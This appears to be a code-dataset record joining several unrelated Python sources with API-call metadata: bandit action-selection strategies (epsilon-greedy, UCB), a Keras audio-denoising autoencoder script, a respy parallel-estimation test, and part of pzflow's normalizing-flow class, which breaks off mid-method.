action_values: List[float],
action_counts: Optional[List[int]] = None,
) -> NoisyActionSelector:
"""Action counts do not matter for this strategy."""
greedy_action = int(np.argmax(action_values))
preferred = DeterministicActionSelector(greedy_action)
noise = UniformDiscreteActionSelector(
len(action_values), random_state=self._rng
)
return NoisyActionSelector(
self.epsilon, preferred, noise, random_state=self._rng
)
class UCB(ActionSelectionStrategy):
"""Upper confidence bound action selection strategy.
    As defined in Sutton & Barto equation 2.10. However, we floor action
counts at `eps` to avoid divide-by-zero.
`t` is inferred by summing the action counts vector and adding 1.
(Because `t` refers to the time step at which action values are being
estimated, i.e. the next time step since the last observation).
Args:
c: confidence parameter
eps: small number to floor zero counts at
"""
def __init__(self, c: float, eps: float = 1.0e-8):
self.c = c
self._eps = eps
def __call__(
self,
action_values: List[float],
action_counts: List[int],
) -> DeterministicActionSelector:
chosen_action = int(np.argmax(self.ucb(action_values, action_counts)))
return DeterministicActionSelector(chosen_action)
def ucb(
self,
action_values: List[float],
action_counts: List[int],
) -> ArrayLike:
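        # UCB score per action: Q(a) + c * sqrt(ln(t) / N(a)),
        # with t = sum(action_counts) + 1 and N(a) floored at self._eps.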
log_t = np.log(np.sum(action_counts) + 1)
floored_counts = np.maximum(action_counts, self._eps)
return action_values + self.c * np.sqrt(log_t / floored_counts)
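
if __name__ == "__main__":
    # Minimal usage sketch (illustrative only): build each strategy and ask it
    # for an ActionSelector; the numeric values below are made up.
    eps_greedy = EpsilonGreedy(epsilon=0.1, random_state=0)
    print(eps_greedy(action_values=[0.2, 0.5, 0.1]))
    ucb = UCB(c=2.0)
    print(ucb(action_values=[0.2, 0.5, 0.1], action_counts=[3, 1, 2]))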
|
[
"numpy.sqrt",
"numpy.random.default_rng",
"rl.action_selectors.DeterministicActionSelector",
"numpy.argmax",
"numpy.sum",
"rl.action_selectors.NoisyActionSelector",
"numpy.maximum"
] |
[((996, 1031), 'numpy.random.default_rng', 'np.random.default_rng', (['random_state'], {}), '(random_state)\n', (1017, 1031), True, 'import numpy as np\n'), ((1317, 1359), 'rl.action_selectors.DeterministicActionSelector', 'DeterministicActionSelector', (['greedy_action'], {}), '(greedy_action)\n', (1344, 1359), False, 'from rl.action_selectors import ActionSelector, DeterministicActionSelector, UniformDiscreteActionSelector, NoisyActionSelector\n'), ((1487, 1562), 'rl.action_selectors.NoisyActionSelector', 'NoisyActionSelector', (['self.epsilon', 'preferred', 'noise'], {'random_state': 'self._rng'}), '(self.epsilon, preferred, noise, random_state=self._rng)\n', (1506, 1562), False, 'from rl.action_selectors import ActionSelector, DeterministicActionSelector, UniformDiscreteActionSelector, NoisyActionSelector\n'), ((2442, 2484), 'rl.action_selectors.DeterministicActionSelector', 'DeterministicActionSelector', (['chosen_action'], {}), '(chosen_action)\n', (2469, 2484), False, 'from rl.action_selectors import ActionSelector, DeterministicActionSelector, UniformDiscreteActionSelector, NoisyActionSelector\n'), ((2678, 2714), 'numpy.maximum', 'np.maximum', (['action_counts', 'self._eps'], {}), '(action_counts, self._eps)\n', (2688, 2714), True, 'import numpy as np\n'), ((1271, 1295), 'numpy.argmax', 'np.argmax', (['action_values'], {}), '(action_values)\n', (1280, 1295), True, 'import numpy as np\n'), ((2626, 2647), 'numpy.sum', 'np.sum', (['action_counts'], {}), '(action_counts)\n', (2632, 2647), True, 'import numpy as np\n'), ((2755, 2786), 'numpy.sqrt', 'np.sqrt', (['(log_t / floored_counts)'], {}), '(log_t / floored_counts)\n', (2762, 2786), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Program to denoise a short speech sample using a pre-trained autoencoder.
PATH_TO_TRAINED_MODEL : path to the pre-trained model (.h5)
PATH_TO_AUDIO : path to the noisy audio file (.wav)
PATH_TO_SAVE : path to save the denoised audio output (.wav)
@author: nk
"""
#%% Dependencies
import numpy as np
import librosa
import soundfile
from tensorflow import keras
#%%
PATH_TO_TRAINED_MODEL = "./trained_models/audio_denoise_AE.h5"
PATH_TO_AUDIO = "./audio_files/test_noisy.wav"
PATH_TO_SAVE = "./audio_files/new_denoised.wav"
#%%
class _Denoise_AE:
'''
Singleton class for denoising short audio samples of spoken words.
'''
model = None
_instance = None
# This is the fitting constant, saved from the training session!
fitting_constant = 7.259422170994068
# This is the sample rate that the model is configured to work with.
SAMPLE_RATE = 22050
def preprocess(self, path_to_audio):
'''
Preprocesses audio file located at specified path.
- Fixes length to 1s
- Extracts spectrogram
'''
data, _ = librosa.load(path_to_audio, sr = self.SAMPLE_RATE)
duration = self.SAMPLE_RATE
# Pad to appropriate length...
if len(data) < duration:
max_offset = np.abs(len(data) - duration)
offset = np.random.randint(max_offset)
data = np.pad(data, (offset, duration-len(data)-offset), "constant")
# ... or cut to appropriate length...
elif len(data) > duration:
max_offset = np.abs(len(data) - duration)
offset = np.random.randint(max_offset)
data = data[offset:len(data)-max_offset+offset]
# ... or leave as is.
else:
offset = 0
# Spectrogram
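        # Magnitude STFT; the final frequency row is dropped, presumably so the
        # spectrogram height matches the autoencoder's expected input shape.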
S = np.abs(librosa.stft(data))[:-1,:]
return S
def denoise(self, path_to_audio):
'''
Denoises input with autoencoder.
'''
# Load spectrogram
S = self.preprocess(path_to_audio)
# Get dimensions
dim_1 = S.shape[0]
dim_2 = S.shape[1]
# Reshape as input tensor
S = np.reshape(S, (1, dim_1, dim_2, 1))
S /= self.fitting_constant
# Get denoised spectrogram from autoencoder
S_denoised = self.model.predict(S).reshape((dim_1, dim_2))
# Convert denoised spectrogram to time series waveform
denoised = librosa.griffinlim(S_denoised) * self.fitting_constant
return denoised
#%%
def Denoise_AE():
# Ensure single instance of AE
    if _Denoise_AE._instance is None:  # check the class attribute directly instead of building a throwaway instance
_Denoise_AE._instance = _Denoise_AE()
_Denoise_AE.model = keras.models.load_model(PATH_TO_TRAINED_MODEL)
return _Denoise_AE._instance
#%%
if __name__ == "__main__":
dnae = Denoise_AE()
dnae2 = Denoise_AE()
assert dnae is dnae2
denoised = dnae.denoise(PATH_TO_AUDIO)
soundfile.write(PATH_TO_SAVE, denoised, dnae.SAMPLE_RATE)
|
[
"numpy.reshape",
"librosa.griffinlim",
"soundfile.write",
"numpy.random.randint",
"tensorflow.keras.models.load_model",
"librosa.stft",
"librosa.load"
] |
[((3027, 3084), 'soundfile.write', 'soundfile.write', (['PATH_TO_SAVE', 'denoised', 'dnae.SAMPLE_RATE'], {}), '(PATH_TO_SAVE, denoised, dnae.SAMPLE_RATE)\n', (3042, 3084), False, 'import soundfile\n'), ((1162, 1210), 'librosa.load', 'librosa.load', (['path_to_audio'], {'sr': 'self.SAMPLE_RATE'}), '(path_to_audio, sr=self.SAMPLE_RATE)\n', (1174, 1210), False, 'import librosa\n'), ((2235, 2270), 'numpy.reshape', 'np.reshape', (['S', '(1, dim_1, dim_2, 1)'], {}), '(S, (1, dim_1, dim_2, 1))\n', (2245, 2270), True, 'import numpy as np\n'), ((2775, 2821), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['PATH_TO_TRAINED_MODEL'], {}), '(PATH_TO_TRAINED_MODEL)\n', (2798, 2821), False, 'from tensorflow import keras\n'), ((1414, 1443), 'numpy.random.randint', 'np.random.randint', (['max_offset'], {}), '(max_offset)\n', (1431, 1443), True, 'import numpy as np\n'), ((2516, 2546), 'librosa.griffinlim', 'librosa.griffinlim', (['S_denoised'], {}), '(S_denoised)\n', (2534, 2546), False, 'import librosa\n'), ((1681, 1710), 'numpy.random.randint', 'np.random.randint', (['max_offset'], {}), '(max_offset)\n', (1698, 1710), True, 'import numpy as np\n'), ((1879, 1897), 'librosa.stft', 'librosa.stft', (['data'], {}), '(data)\n', (1891, 1897), False, 'import librosa\n')]
|
import numpy as np
import pytest
from respy import RespyCls
from respy.python.shared.shared_constants import IS_PARALLELISM_MPI
from respy.python.shared.shared_constants import IS_PARALLELISM_OMP
from respy.tests.codes.auxiliary import compare_est_log
from respy.tests.codes.auxiliary import simulate_observed
from respy.tests.codes.random_model import generate_random_model
@pytest.mark.skipif(
not IS_PARALLELISM_MPI and not IS_PARALLELISM_OMP, reason="No PARALLELISM available"
)
class TestClass(object):
"""This class groups together some tests."""
def test_1(self):
"""Ensure that it makes no difference whether the
criterion function is evaluated in parallel or not.
"""
# Generate random initialization file
constr = {
"program": {"version": "fortran"},
"estimation": {"maxfun": np.random.randint(0, 50)},
}
params_spec, options_spec = generate_random_model(point_constr=constr)
# If delta is a not fixed, we need to ensure a bound-constraint optimizer.
# However, this is not the standard flag_estimation as the number of function
# evaluation is possibly much larger to detect and differences in the updates of
# the optimizer steps depending on the implementation.
if params_spec.loc[("delta", "delta"), "fixed"] is False:
options_spec["estimation"]["optimizer"] = "FORT-BOBYQA"
base = None
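        # The first configuration evaluated sets the benchmark criterion value;
        # every subsequent configuration must reproduce it exactly.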
for is_parallel in [True, False]:
options_spec["program"]["threads"] = 1
options_spec["program"]["procs"] = 1
if is_parallel:
if IS_PARALLELISM_OMP:
options_spec["program"]["threads"] = np.random.randint(2, 5)
if IS_PARALLELISM_MPI:
options_spec["program"]["procs"] = np.random.randint(2, 5)
respy_obj = RespyCls(params_spec, options_spec)
respy_obj = simulate_observed(respy_obj)
_, crit_val = respy_obj.fit()
if base is None:
base = crit_val
np.testing.assert_equal(base, crit_val)
def test_2(self):
""" This test ensures that the record files are identical.
"""
# Generate random initialization file. The number of periods is higher than
# usual as only FORTRAN implementations are used to solve the random request.
# This ensures that also some cases of interpolation are explored.
constr = {
"program": {"version": "fortran"},
"num_periods": np.random.randint(3, 10),
"estimation": {"maxfun": 0},
}
params_spec, options_spec = generate_random_model(point_constr=constr)
base_sol_log, base_est_info_log = None, None
base_est_log = None
for is_parallel in [False, True]:
options_spec["program"]["threads"] = 1
options_spec["program"]["procs"] = 1
if is_parallel:
if IS_PARALLELISM_OMP:
options_spec["program"]["threads"] = np.random.randint(2, 5)
if IS_PARALLELISM_MPI:
options_spec["program"]["procs"] = np.random.randint(2, 5)
respy_obj = RespyCls(params_spec, options_spec)
file_sim = respy_obj.get_attr("file_sim")
simulate_observed(respy_obj)
respy_obj.fit()
# Check for identical records
fname = file_sim + ".respy.sol"
if base_sol_log is None:
base_sol_log = open(fname, "r").read()
assert open(fname, "r").read() == base_sol_log
if base_est_info_log is None:
base_est_info_log = open("est.respy.info", "r").read()
assert open("est.respy.info", "r").read() == base_est_info_log
if base_est_log is None:
base_est_log = open("est.respy.log", "r").readlines()
compare_est_log(base_est_log)
|
[
"numpy.testing.assert_equal",
"respy.tests.codes.random_model.generate_random_model",
"respy.tests.codes.auxiliary.compare_est_log",
"numpy.random.randint",
"respy.RespyCls",
"pytest.mark.skipif",
"respy.tests.codes.auxiliary.simulate_observed"
] |
[((379, 487), 'pytest.mark.skipif', 'pytest.mark.skipif', (['(not IS_PARALLELISM_MPI and not IS_PARALLELISM_OMP)'], {'reason': '"""No PARALLELISM available"""'}), "(not IS_PARALLELISM_MPI and not IS_PARALLELISM_OMP,\n reason='No PARALLELISM available')\n", (397, 487), False, 'import pytest\n'), ((940, 982), 'respy.tests.codes.random_model.generate_random_model', 'generate_random_model', ([], {'point_constr': 'constr'}), '(point_constr=constr)\n', (961, 982), False, 'from respy.tests.codes.random_model import generate_random_model\n'), ((2693, 2735), 'respy.tests.codes.random_model.generate_random_model', 'generate_random_model', ([], {'point_constr': 'constr'}), '(point_constr=constr)\n', (2714, 2735), False, 'from respy.tests.codes.random_model import generate_random_model\n'), ((1894, 1929), 'respy.RespyCls', 'RespyCls', (['params_spec', 'options_spec'], {}), '(params_spec, options_spec)\n', (1902, 1929), False, 'from respy import RespyCls\n'), ((1954, 1982), 'respy.tests.codes.auxiliary.simulate_observed', 'simulate_observed', (['respy_obj'], {}), '(respy_obj)\n', (1971, 1982), False, 'from respy.tests.codes.auxiliary import simulate_observed\n'), ((2099, 2138), 'numpy.testing.assert_equal', 'np.testing.assert_equal', (['base', 'crit_val'], {}), '(base, crit_val)\n', (2122, 2138), True, 'import numpy as np\n'), ((2579, 2603), 'numpy.random.randint', 'np.random.randint', (['(3)', '(10)'], {}), '(3, 10)\n', (2596, 2603), True, 'import numpy as np\n'), ((3254, 3289), 'respy.RespyCls', 'RespyCls', (['params_spec', 'options_spec'], {}), '(params_spec, options_spec)\n', (3262, 3289), False, 'from respy import RespyCls\n'), ((3358, 3386), 'respy.tests.codes.auxiliary.simulate_observed', 'simulate_observed', (['respy_obj'], {}), '(respy_obj)\n', (3375, 3386), False, 'from respy.tests.codes.auxiliary import simulate_observed\n'), ((3965, 3994), 'respy.tests.codes.auxiliary.compare_est_log', 'compare_est_log', (['base_est_log'], {}), '(base_est_log)\n', (3980, 3994), False, 'from respy.tests.codes.auxiliary import compare_est_log\n'), ((866, 890), 'numpy.random.randint', 'np.random.randint', (['(0)', '(50)'], {}), '(0, 50)\n', (883, 890), True, 'import numpy as np\n'), ((1727, 1750), 'numpy.random.randint', 'np.random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (1744, 1750), True, 'import numpy as np\n'), ((1845, 1868), 'numpy.random.randint', 'np.random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (1862, 1868), True, 'import numpy as np\n'), ((3087, 3110), 'numpy.random.randint', 'np.random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (3104, 3110), True, 'import numpy as np\n'), ((3205, 3228), 'numpy.random.randint', 'np.random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (3222, 3228), True, 'import numpy as np\n')]
|
import itertools
from typing import Any, Callable, Sequence, Tuple
import dill as pickle
import jax.numpy as np
import numpy as onp
import pandas as pd
from jax import grad, jit, ops, random
from jax.experimental.optimizers import Optimizer, adam
from pzflow import distributions
from pzflow.bijectors import Bijector_Info, InitFunction, Pytree
from pzflow.utils import build_bijector_from_info, gaussian_error_model
class Flow:
"""A normalizing flow that models tabular data.
Attributes
----------
data_columns : tuple
List of DataFrame columns that the flow expects/produces.
conditional_columns : tuple
List of DataFrame columns on which the flow is conditioned.
info : Any
Object containing any kind of info included with the flow.
Often describes the data the flow is trained on.
latent
The latent distribution of the normalizing flow.
        Has its own sample and log_prob methods.
"""
def __init__(
self,
data_columns: Sequence[str] = None,
bijector: Tuple[InitFunction, Bijector_Info] = None,
conditional_columns: Sequence[str] = None,
latent=None,
data_error_model: Callable = None,
condition_error_model: Callable = None,
autoscale_conditions: bool = True,
seed: int = 0,
info: Any = None,
file: str = None,
_dictionary: dict = None,
):
"""Instantiate a normalizing flow.
Note that while all of the init parameters are technically optional,
you must provide either data_columns and bijector OR file.
In addition, if a file is provided, all other parameters must be None.
Parameters
----------
data_columns : Sequence[str], optional
Tuple, list, or other container of column names.
These are the columns the flow expects/produces in DataFrames.
bijector : Bijector Call, optional
A Bijector call that consists of the bijector InitFunction that
initializes the bijector and the tuple of Bijector Info.
Can be the output of any Bijector, e.g. Reverse(), Chain(...), etc.
conditional_columns : Sequence[str], optional
Names of columns on which to condition the normalizing flow.
latent : distribution, optional
The latent distribution for the normalizing flow. Can be any of
the distributions from pzflow.distributions. If not provided,
a normal distribution is used with the number of dimensions
inferred.
data_error_model : Callable, optional
A callable that defines the error model for data variables.
data_error_model must take key, X, Xerr, nsamples as arguments where:
key is a jax rng key, e.g. jax.random.PRNGKey(0)
X is a 2 dimensional array of data variables, where the order
of variables matches the order of the columns in data_columns
Xerr is the corresponding 2 dimensional array of errors
nsamples is the number of samples to draw from the error distribution
data_error_model must return an array of samples with the shape
(X.shape[0], nsamples, X.shape[1]).
If data_error_model is not provided, a Gaussian error model is assumed.
condition_error_model : Callable, optional
A callable that defines the error model for conditional variables.
condition_error_model must take key, X, Xerr, nsamples as arguments where:
key is a jax rng key, e.g. jax.random.PRNGKey(0)
X is a 2 dimensional array of conditional variables, where the order
of variables matches the order of the columns in conditional_columns
Xerr is the corresponding 2 dimensional array of errors
nsamples is the number of samples to draw from the error distribution
condition_error_model must return an array of samples with the shape
(X.shape[0], nsamples, X.shape[1]).
If condition_error_model is not provided, a Gaussian error model is assumed.
autoscale_conditions : bool, default=True
Sets whether or not conditions are automatically standard scaled when
passed to a conditional flow. I recommend you leave this as True.
seed : int, default=0
The random seed for initial parameters
info : Any, optional
An object to attach to the info attribute.
file : str, optional
Path to file from which to load a pretrained flow.
If a file is provided, all other parameters must be None.
"""
# validate parameters
if (
data_columns is None
and bijector is None
and file is None
and _dictionary is None
):
raise ValueError("You must provide data_columns and bijector OR file.")
if data_columns is not None and bijector is None:
raise ValueError("Please also provide a bijector.")
if data_columns is None and bijector is not None:
raise ValueError("Please also provide data_columns.")
if any(
(
data_columns is not None,
bijector is not None,
conditional_columns is not None,
latent is not None,
data_error_model is not None,
condition_error_model is not None,
info is not None,
)
):
if file is not None:
raise ValueError(
"If providing a file, please do not provide any other parameters."
)
if _dictionary is not None:
raise ValueError(
"If providing a dictionary, please do not provide any other parameters."
)
if file is not None and _dictionary is not None:
raise ValueError("Only provide file or _dictionary, not both.")
# if file or dictionary is provided, load everything from it
if file is not None or _dictionary is not None:
save_dict = self._save_dict()
if file is not None:
with open(file, "rb") as handle:
save_dict.update(pickle.load(handle))
else:
save_dict.update(_dictionary)
if save_dict["class"] != self.__class__.__name__:
raise TypeError(
f"This save file isn't a {self.__class__.__name__}."
+ f"It is a {save_dict['class']}"
)
# load columns and dimensions
self.data_columns = save_dict["data_columns"]
self.conditional_columns = save_dict["conditional_columns"]
self._input_dim = len(self.data_columns)
self.info = save_dict["info"]
# load the latent distribution
self._latent_info = save_dict["latent_info"]
self.latent = getattr(distributions, self._latent_info[0])(
*self._latent_info[1]
)
# load the error models
self.data_error_model = save_dict["data_error_model"]
self.condition_error_model = save_dict["condition_error_model"]
# load the bijector
self._bijector_info = save_dict["bijector_info"]
init_fun, _ = build_bijector_from_info(self._bijector_info)
_, self._forward, self._inverse = init_fun(
random.PRNGKey(0), self._input_dim
)
self._params = save_dict["params"]
# load the conditional means and stds
self._condition_means = save_dict["condition_means"]
self._condition_stds = save_dict["condition_stds"]
# set whether or not to automatically standard scale any
# conditions passed to the normalizing flow
self._autoscale_conditions = save_dict["autoscale_conditions"]
# if no file is provided, use provided parameters
else:
self.data_columns = tuple(data_columns)
self._input_dim = len(self.data_columns)
self.info = info
if conditional_columns is None:
self.conditional_columns = None
self._condition_means = None
self._condition_stds = None
else:
self.conditional_columns = tuple(conditional_columns)
self._condition_means = np.zeros(len(self.conditional_columns))
self._condition_stds = np.ones(len(self.conditional_columns))
# set whether or not to automatically standard scale any
# conditions passed to the normalizing flow
self._autoscale_conditions = autoscale_conditions
# set up the latent distribution
if latent is None:
self.latent = distributions.Normal(self._input_dim)
else:
self.latent = latent
self._latent_info = self.latent.info
# set up the error models
if data_error_model is None:
self.data_error_model = gaussian_error_model
else:
self.data_error_model = data_error_model
if condition_error_model is None:
self.condition_error_model = gaussian_error_model
else:
self.condition_error_model = condition_error_model
# set up the bijector with random params
init_fun, self._bijector_info = bijector
bijector_params, self._forward, self._inverse = init_fun(
random.PRNGKey(seed), self._input_dim
)
self._params = (self.latent._params, bijector_params)
def _get_conditions(self, inputs: pd.DataFrame) -> np.ndarray:
"""Return an array of the bijector conditions."""
# if this isn't a conditional flow, just return empty conditions
if self.conditional_columns is None:
conditions = np.zeros((inputs.shape[0], 1))
# if this a conditional flow, return an array of the conditions
else:
columns = list(self.conditional_columns)
conditions = np.array(inputs[columns].values)
conditions = (conditions - self._condition_means) / self._condition_stds
return conditions
def _get_err_samples(
self,
key,
inputs: pd.DataFrame,
err_samples: int,
type: str = "data",
skip: str = None,
) -> np.ndarray:
"""Draw error samples for each row of inputs. """
X = inputs.copy()
# get list of columns
if type == "data":
columns = list(self.data_columns)
error_model = self.data_error_model
elif type == "conditions":
if self.conditional_columns is None:
return np.zeros((err_samples * X.shape[0], 1))
else:
columns = list(self.conditional_columns)
error_model = self.condition_error_model
else:
raise ValueError("type must be `data` or `conditions`.")
# make sure all relevant variables have error columns
for col in columns:
# if errors not provided for the column, fill in zeros
if f"{col}_err" not in inputs.columns and col != skip:
X[f"{col}_err"] = np.zeros(X.shape[0])
# if we are skipping this column, fill in nan's
elif col == skip:
X[col] = np.nan * np.zeros(X.shape[0])
X[f"{col}_err"] = np.nan * np.zeros(X.shape[0])
# pull out relevant columns
err_columns = [col + "_err" for col in columns]
X, Xerr = np.array(X[columns].values), np.array(X[err_columns].values)
# generate samples
Xsamples = error_model(key, X, Xerr, err_samples)
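        # Flatten to (n_rows * err_samples, n_features) so all error samples
        # can be pushed through the flow in a single batch.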
Xsamples = Xsamples.reshape(X.shape[0] * err_samples, X.shape[1])
# delete the column corresponding to skip
if skip is not None:
idx = columns.index(skip)
Xsamples = np.delete(Xsamples, idx, axis=1)
# if these are samples of conditions, standard scale them!
if type == "conditions":
Xsamples = (Xsamples - self._condition_means) / self._condition_stds
return Xsamples
def _log_prob(
self, params: Pytree, inputs: np.ndarray, conditions: np.ndarray
) -> np.ndarray:
"""Log prob for arrays."""
# calculate log_prob
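        # change of variables: log p_x(x) = log p_u(u) + log|det J|,
        # where u and log|det J| come from the forward bijection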
u, log_det = self._forward(params[1], inputs, conditions=conditions)
log_prob = self.latent.log_prob(params[0], u) + log_det
# set NaN's to negative infinity (i.e. zero probability)
log_prob = np.nan_to_num(log_prob, nan=np.NINF)
return log_prob
def log_prob(
self, inputs: pd.DataFrame, err_samples: int = None, seed: int = None
) -> np.ndarray:
"""Calculates log probability density of inputs.
Parameters
----------
inputs : pd.DataFrame
Input data for which log probability density is calculated.
Every column in self.data_columns must be present.
If self.conditional_columns is not None, those must be present
as well. If other columns are present, they are ignored.
err_samples : int, default=None
Number of samples from the error distribution to average over for
the log_prob calculation. If provided, Gaussian errors are assumed,
and method will look for error columns in `inputs`. Error columns
must end in `_err`. E.g. the error column for the variable `u` must
be `u_err`. Zero error assumed for any missing error columns.
seed : int, default=None
Random seed for drawing the samples with Gaussian errors.
Returns
-------
np.ndarray
Device array of shape (inputs.shape[0],).
"""
if err_samples is None:
# convert data to an array with columns ordered
columns = list(self.data_columns)
X = np.array(inputs[columns].values)
# get conditions
conditions = self._get_conditions(inputs)
# calculate log_prob
return self._log_prob(self._params, X, conditions)
else:
# validate nsamples
assert isinstance(
err_samples, int
), "err_samples must be a positive integer."
assert err_samples > 0, "err_samples must be a positive integer."
# get Gaussian samples
seed = onp.random.randint(1e18) if seed is None else seed
key = random.PRNGKey(seed)
X = self._get_err_samples(key, inputs, err_samples, type="data")
C = self._get_err_samples(key, inputs, err_samples, type="conditions")
# calculate log_probs
log_probs = self._log_prob(self._params, X, C)
probs = np.exp(log_probs.reshape(-1, err_samples))
return np.log(probs.mean(axis=1))
def posterior(
self,
inputs: pd.DataFrame,
column: str,
grid: np.ndarray,
marg_rules: dict = None,
normalize: bool = True,
err_samples: int = None,
seed: int = None,
batch_size: int = None,
nan_to_zero: bool = True,
) -> np.ndarray:
"""Calculates posterior distributions for the provided column.
Calculates the conditional posterior distribution, assuming the
data values in the other columns of the DataFrame.
Parameters
----------
inputs : pd.DataFrame
Data on which the posterior distributions are conditioned.
Must have columns matching self.data_columns, *except*
for the column specified for the posterior (see below).
column : str
Name of the column for which the posterior distribution
is calculated. Must be one of the columns in self.data_columns.
However, whether or not this column is one of the columns in
`inputs` is irrelevant.
grid : np.ndarray
Grid on which to calculate the posterior.
marg_rules : dict, optional
Dictionary with rules for marginalizing over missing variables.
The dictionary must contain the key "flag", which gives the flag
that indicates a missing value. E.g. if missing values are given
the value 99, the dictionary should contain {"flag": 99}.
The dictionary must also contain {"name": callable} for any
variables that will need to be marginalized over, where name is
the name of the variable, and callable is a callable that takes
            the row of variables and returns a grid over which to marginalize
the variable. E.g. {"y": lambda row: np.linspace(0, row["x"], 10)}.
Note: the callable for a given name must *always* return an array
of the same length, regardless of the input row.
err_samples : int, default=None
Number of samples from the error distribution to average over for
the posterior calculation. If provided, Gaussian errors are assumed,
and method will look for error columns in `inputs`. Error columns
must end in `_err`. E.g. the error column for the variable `u` must
be `u_err`. Zero error assumed for any missing error columns.
seed : int, default=None
Random seed for drawing the samples with Gaussian errors.
batch_size : int, default=None
Size of batches in which to calculate posteriors. If None, all
posteriors are calculated simultaneously. Simultaneous calculation
is faster, but memory intensive for large data sets.
normalize : boolean, default=True
Whether to normalize the posterior so that it integrates to 1.
nan_to_zero : bool, default=True
Whether to convert NaN's to zero probability in the final pdfs.
Returns
-------
np.ndarray
Device array of shape (inputs.shape[0], grid.size).
"""
# get the index of the provided column, and remove it from the list
columns = list(self.data_columns)
idx = columns.index(column)
columns.remove(column)
nrows = inputs.shape[0]
batch_size = nrows if batch_size is None else batch_size
# make sure indices run 0 -> nrows
inputs = inputs.reset_index(drop=True)
if err_samples is not None:
# validate nsamples
assert isinstance(
err_samples, int
), "err_samples must be a positive integer."
assert err_samples > 0, "err_samples must be a positive integer."
# set the seed
seed = onp.random.randint(1e18) if seed is None else seed
key = random.PRNGKey(seed)
# empty array to hold pdfs
pdfs = np.zeros((nrows, len(grid)))
# if marginalization rules were passed, we will loop over the rules
# and repeatedly call this method
if marg_rules is not None:
# if the flag is NaN, we must use np.isnan to check for flags
if onp.isnan(marg_rules["flag"]):
def check_flags(data):
return onp.isnan(data)
# else we use np.isclose to check for flags
else:
def check_flags(data):
return onp.isclose(data, marg_rules["flag"])
# first calculate pdfs for unflagged rows
unflagged_idx = inputs[
~check_flags(inputs[columns]).any(axis=1)
].index.tolist()
unflagged_pdfs = self.posterior(
inputs=inputs.iloc[unflagged_idx],
column=column,
grid=grid,
err_samples=err_samples,
seed=seed,
batch_size=batch_size,
normalize=False,
nan_to_zero=nan_to_zero,
)
# save these pdfs in the big array
pdfs = ops.index_update(
pdfs,
ops.index[unflagged_idx, :],
unflagged_pdfs,
indices_are_sorted=True,
unique_indices=True,
)
# we will keep track of all the rows we've already calculated
# posteriors for
already_done = unflagged_idx
# now we will loop over the rules in marg_rules
for name, rule in marg_rules.items():
# ignore the flag, because that's not a column in the data
if name == "flag":
continue
# get the list of new rows for which we need to calculate posteriors
flagged_idx = inputs[check_flags(inputs[name])].index.tolist()
flagged_idx = list(set(flagged_idx).difference(already_done))
# if flagged_idx is empty, move on!
if len(flagged_idx) == 0:
continue
# get the marginalization grid for each row
marg_grids = (
inputs.iloc[flagged_idx]
.apply(rule, axis=1, result_type="expand")
.values
)
# make a new data frame with the marginalization grids replacing
# the values of the flag in the column
marg_inputs = pd.DataFrame(
np.repeat(
inputs.iloc[flagged_idx].values, marg_grids.shape[1], axis=0
),
columns=inputs.columns,
)
marg_inputs[name] = marg_grids.reshape(marg_inputs.shape[0], 1)
# remove the error column if it's present
marg_inputs.drop(f"{name}_err", axis=1, inplace=True, errors="ignore")
# calculate posteriors for these
marg_pdfs = self.posterior(
inputs=marg_inputs,
column=column,
grid=grid,
marg_rules=marg_rules,
err_samples=err_samples,
seed=seed,
batch_size=batch_size,
normalize=False,
nan_to_zero=nan_to_zero,
)
# sum over the marginalized dimension
marg_pdfs = marg_pdfs.reshape(
len(flagged_idx), marg_grids.shape[1], grid.size
)
marg_pdfs = marg_pdfs.sum(axis=1)
# save the new pdfs in the big array
pdfs = ops.index_update(
pdfs,
ops.index[flagged_idx, :],
marg_pdfs,
indices_are_sorted=True,
unique_indices=True,
)
# add these flagged indices to the list of rows already done
already_done += flagged_idx
# now for the main posterior calculation loop
else:
# loop through batches
for batch_idx in range(0, nrows, batch_size):
# get the data batch
            # and, if this is a conditional flow, the corresponding conditions
batch = inputs.iloc[batch_idx : batch_idx + batch_size]
# if not drawing samples, just grab batch and conditions
if err_samples is None:
conditions = self._get_conditions(batch)
batch = np.array(batch[columns].values)
# if only drawing condition samples...
elif len(self.data_columns) == 1:
conditions = self._get_err_samples(
key, batch, err_samples, type="conditions"
)
batch = np.repeat(batch[columns].values, err_samples, axis=0)
# if drawing data and condition samples...
else:
conditions = self._get_err_samples(
key, batch, err_samples, type="conditions"
)
batch = self._get_err_samples(
key, batch, err_samples, skip=column, type="data"
)
# make a new copy of each row for each value of the column
# for which we are calculating the posterior
batch = np.hstack(
(
np.repeat(batch[:, :idx], len(grid), axis=0,),
np.tile(grid, len(batch))[:, None],
np.repeat(batch[:, idx:], len(grid), axis=0,),
)
)
# make similar copies of the conditions
conditions = np.repeat(conditions, len(grid), axis=0)
# calculate probability densities
log_prob = self._log_prob(self._params, batch, conditions).reshape(
(-1, len(grid))
)
prob = np.exp(log_prob)
# if we were Gaussian sampling, average over the samples
if err_samples is not None:
prob = prob.reshape(-1, err_samples, len(grid))
prob = prob.mean(axis=1)
# add the pdfs to the bigger list
pdfs = ops.index_update(
pdfs,
ops.index[batch_idx : batch_idx + batch_size, :],
prob,
indices_are_sorted=True,
unique_indices=True,
)
if normalize:
# normalize so they integrate to one
pdfs = pdfs / np.trapz(y=pdfs, x=grid).reshape(-1, 1)
if nan_to_zero:
# set NaN's equal to zero probability
pdfs = np.nan_to_num(pdfs, nan=0.0)
return pdfs
def sample(
self,
nsamples: int = 1,
conditions: pd.DataFrame = None,
save_conditions: bool = True,
seed: int = None,
) -> pd.DataFrame:
"""Returns samples from the normalizing flow.
Parameters
----------
nsamples : int, default=1
The number of samples to be returned.
conditions : pd.DataFrame, optional
If this is a conditional flow, you must pass conditions for
each sample. nsamples will be drawn for each row in conditions.
save_conditions : bool, default=True
If true, conditions will be saved in the DataFrame of samples
that is returned.
seed : int, optional
Sets the random seed for the samples.
Returns
-------
pd.DataFrame
Pandas DataFrame of samples.
"""
# validate nsamples
assert isinstance(nsamples, int), "nsamples must be a positive integer."
assert nsamples > 0, "nsamples must be a positive integer."
if self.conditional_columns is not None and conditions is None:
raise ValueError(
f"Must provide the following conditions\n{self.conditional_columns}"
)
# if this isn't a conditional flow, get empty conditions
if self.conditional_columns is None:
